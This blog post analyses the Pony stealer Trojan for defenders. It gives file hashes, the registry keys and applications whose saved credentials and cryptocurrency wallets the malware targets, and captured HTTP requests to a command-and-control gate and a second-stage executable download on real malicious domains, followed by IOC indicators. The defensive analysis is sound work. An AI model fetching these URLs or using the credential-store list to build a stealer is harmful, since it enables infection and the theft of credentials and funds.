Pony Trojan reversing (part-I)

Pony Trojan reversing (part-I)

Add Comment , , , , , , , Edit
Pony is a stealer Trojan and has been active for quite a while now. It was responsible for stealing over $200,000 in bitcoins ( https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/) . In this post we will try to cover the reversing of pony Trojan.
Tools required

  1. VMware
  2. IDA Disassembler
  3. OllyDbg Debugger
  4. Hex editor
First, we will examine its dynamic analysis behavior.
FILE NAME tt2.exe
FILE SIZE 209408 bytes
FILE TYPE PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 6245899b11a6bd6769b3656943322d13
SHA1 9879565d8c82e356cb7da62b9f04c3707cd3aac8
SHA256 15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1
SHA512 1a0dd9df25e3bd03e80b1563fa13f71f536e353d06cc07ba52f6c40255ace7d13f909e319337e34ce0164a5c1c6c435569b4e3cdba1f02d82425ec42f58cf080
CRC32 906EA658
SSDEEP 3072:zGYRxKHi2O9dXvuq+OqUkPdlvWjrcJUVRC169xF5VeOF8x0sk:zRTKHid6OWPdacJUVU6FeOe0D
YARA None matched
Running it though Cuckoo we get the following basic details about it:
We now have an initial idea what the malware is doing. It can be summarized as:
  1. Connects to traffic.
  2. Has an anti-sandbox feature (based on time difference)
  3. Hooks and Reads browser data.
  4. Hides itself in ADS.
Look at some of its some of its registry modification or retrievals.
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar
HKEY_CURRENT_USER\Software\FlashFXP\3
HKEY_CURRENT_USER\Software\FlashFXP
HKEY_CURRENT_USER\Software\FlashFXP\4
HKEY_LOCAL_MACHINE\Software\FlashFXP\3
HKEY_LOCAL_MACHINE\Software\FlashFXP
HKEY_LOCAL_MACHINE\Software\FlashFXP\4
HKEY_CURRENT_USER\Software\FileZilla
HKEY_CURRENT_USER\Software\FileZilla Client
HKEY_LOCAL_MACHINE\Software\FileZilla
HKEY_LOCAL_MACHINE\Software\FileZilla Client
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options
HKEY_CURRENT_USER\Software\BPFTP
HKEY_CURRENT_USER\Software\TurboFTP
HKEY_LOCAL_MACHINE\Software\TurboFTP
HKEY_CURRENT_USER\Software\Sota\FFFTP
HKEY_CURRENT_USER\Software\Sota\FFFTP\Options
HKEY_CURRENT_USER\Software\CoffeeCup Software\Internet\Profiles
HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites
HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_CURRENT_USER\Software\Cryer\WebSitePublisher
HKEY_CURRENT_USER\Software\ExpanDrive\Sessions
HKEY_CURRENT_USER\Software\ExpanDrive
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\SOFTWARE\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\SOFTWARE\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\FTPClient\Sites
HKEY_LOCAL_MACHINE\Software\FTPClient\Sites
HKEY_CURRENT_USER\Software\SoftX.org\FTPClient\Sites
HKEY_LOCAL_MACHINE\Software\SoftX.org\FTPClient\Sites
HKEY_CURRENT_USER\SOFTWARE\LeapWare
HKEY_LOCAL_MACHINE\SOFTWARE\LeapWare
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_CURRENT_USER\Software\South River Technologies\WebDrive\Connections
HKEY_LOCAL_MACHINE\Software\South River Technologies\WebDrive\Connections
As you can see, it is evident that it is trying to look for stored password related information. Apart from stored credentials, it also steals bitcoin. Following is the list software it tries to steal from:
AR Manager FTPGetter Pocomail
Total Commander ALFTP IncrediMail
WS_FTP Internet Explorer The Bat!
CuteFTP Dreamweaver Outlook
FlashFXP DeluxeFTP Thunderbird
FileZilla Google Chrome FastTrackFTP
FTP Commander Chromium / SRWare Iron Bitcoin
BulletProof FTP ChromePlus Electrum
SmartFTP Bromium (Yandex Chrome) MultiBit
TurboFTP Nichrome FTP Disk
FFFTP Comodo Dragon Litecoin
CoffeeCup FTP / Sitemapper RockMelt Namecoin
CoreFTP K-Meleon Terracoin
FTP Explorer Epic Bitcoin Armory
Frigate3 FTP Staff-FTP PPCoin (Peercoin)
SecureFX AceFTP Primecoin
UltraFXP Global Downloader Feathercoin
FTPRush FreshFTP NovaCoin
WebSitePublisher BlazeFTP Freicoin
BitKinex NETFile Devcoin
ExpanDrive GoFTP Frankocoin
ClassicFTP 3D-FTP ProtoShares
Fling Easy FTP MegaCoin
SoftX Xftp Quarkcoin
Directory Opus FTP Now Worldcoin
FreeFTP / DirectFTP Robo-FTP Infinitecoin
LeapFTP LinasFTP Ixcoin
WinSCP Cyberduck Anoncoin
32bit FTP Putty BBQcoin
NetDrive Notepad + + Digitalcoin
WebDrive CoffeeCup Visual Site Designer Mincoin
FTP Control FTPShell Goldcoin
Opera FTPInfo Yacoin
WiseFTP NexusFile Zetacoin
FTP Voyager FastStone Browser Fastcoin
Firefox CoolNovo I0coin
FireFTP WinZip Tagcoin
SeaMonkey Yandex.Internet / Ya.Browser Bytecoin
Flock MyFTP Florincoin
Mozilla sherrod FTP Phoenixcoin
LeechFTP NovaFTP Luckycoin
Odin Secure FTP Expert Windows Mail Craftcoin
WinFTP Windows Live Mail Junkcoin
FTP Surfer Becky!
It copies itself into the system by using an integer filename, which is executed though a chain of ShellExecuteEx
FILE NAME 31780534.exe
FILE SIZE 317440 bytes
FILE TYPE PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 2bd7a3cc81ae70b16b2a85008fb7dd81
SHA1 7bf35f051a44dc31f0b138e1874e1d75745d49b3
SHA256 57e38fcc3a641896f351f4bdd7308d7b38b2e9981a8fc7ea5512dfcd8935d856
CRC32 4AA8F5BD
SSDEEP 6144:D9mlPaljn+AGwnc6AAech5ppsx7K05mtq1pTOw7/Cr:xm5aZ+MpemzpsdK0m+N7M
YARA None matched
Not only does pony steal information, but it also downloads other malware, which are hardcoded in the binary itself
http://titratresfi.ru/gate.php POST /gate.php HTTP/1.0
Host: titratresfi.ru
Accept: */*
Accept-Encoding: identity, *;q=0
 Accept-Language: en-US

Content-Length: 270

Content-Type: application/octet-stream

Connection: close

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http://adishma.com/media/system/shost.exe GET /media/system/shost.exe HTTP/1.0
Host: adishma.com
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Now let’s look at the network traffic it has generated.
It sends basic information to the command and control server, which we are going to examine deeply in the second post.
Network information
domain: TITRATRESFI.RU
nserver: ns1.entrydns.net.
nserver: ns2.entrydns.net.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: R01-RU
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2015.11.09
paid-till: 2016.11.09
free-date: 2016.12.10
source: TCI
Last updated on 2015.11.15 16:16:33 MSK
Domain Name: ADISHMA.COM
Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Sponsoring Registrar IANA ID: 303
Whois Server: whois.PublicDomainRegistry.com
Referral URL: http://www.PublicDomainRegistry.com
Name Server: NS1.SOFTONETECHNOLOGIES.COM
Name Server: NS2.SOFTONETECHNOLOGIES.COM
Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Updated Date: 07-sep-2015
Creation Date: 26-dec-2014
Expiration Date: 26-dec-2015
IOC
<Indicator id=”aae1b2d0-a5ad-471a-8c48-2296f6cfb49e” operator=”OR”>
<IndicatorItem condition=”is” id=”b1984833-80fe-446b-a3d8-3349822f6336″>
<Context document=”FileItem” search=”FileItem/Md5sum” type=”mir”/>
<Content type=”md5″>6245899b11a6bd6769b3656943322d13</Content>
</IndicatorItem>
<IndicatorItem condition=”is” id=”e2168e97-5db8-4432-b498-8a5973deeb42″>
<Context document=”FileItem” search=”FileItem/Sha1sum” type=”mir”/>
<Content type=”sha1″>9879565d8c82e356cb7da62b9f04c3707cd3aac8</Content>
</IndicatorItem>
<IndicatorItem condition=”is” id=”f66fb3f0-1178-4638-bf06-24d131cfd2c7″>
<Context document=”FileItem” search=”FileItem/Sha256sum” type=”mir”/>
<Content type=”sha256″>15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</Content>
</IndicatorItem>
<Indicator id=”81c75ab7-69b2-434d-808f-607a5b283cec” operator=”AND”>
<IndicatorItem condition=”is” id=”bb45ed4b-823c-41d0-8831-0ab41c874a7f”>
<Context document=”FileItem” search=”FileItem/FileName” type=”mir”/>
<Content type=”string”>Centrylink</Content>
</IndicatorItem>
<IndicatorItem condition=”is” id=”9194b695-6af4-428f-b2cf-3a40c2560e78″>
<Context document=”FileItem” search=”FileItem/SizeInBytes” type=”mir”/>
<Content type=”int”>209408</Content>
</IndicatorItem>
<IndicatorItem condition=”is” id=”010608b2-0016-426d-9dce-2e9ad855f786″>
<Context document=”FileItem” search=”FileItem/PEInfo/PETimeStamp” type=”mir”/>
<Content type=”date”>2015-11-12T09:49:00Z</Content>
</IndicatorItem>
</Indicator>
Using VT we are able to map other files which are using the same location for downloading other malware.
SHARE

Dhirendra Biswal

Hi. I'm Dhirendra The Admin of this Blog I'm A Certified Ethical Hacker also a Web Developer With Programming Skills in various Programming Languages.

  • Image
  • Image
  • Image
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Subscribe to: Post Comments ( Atom )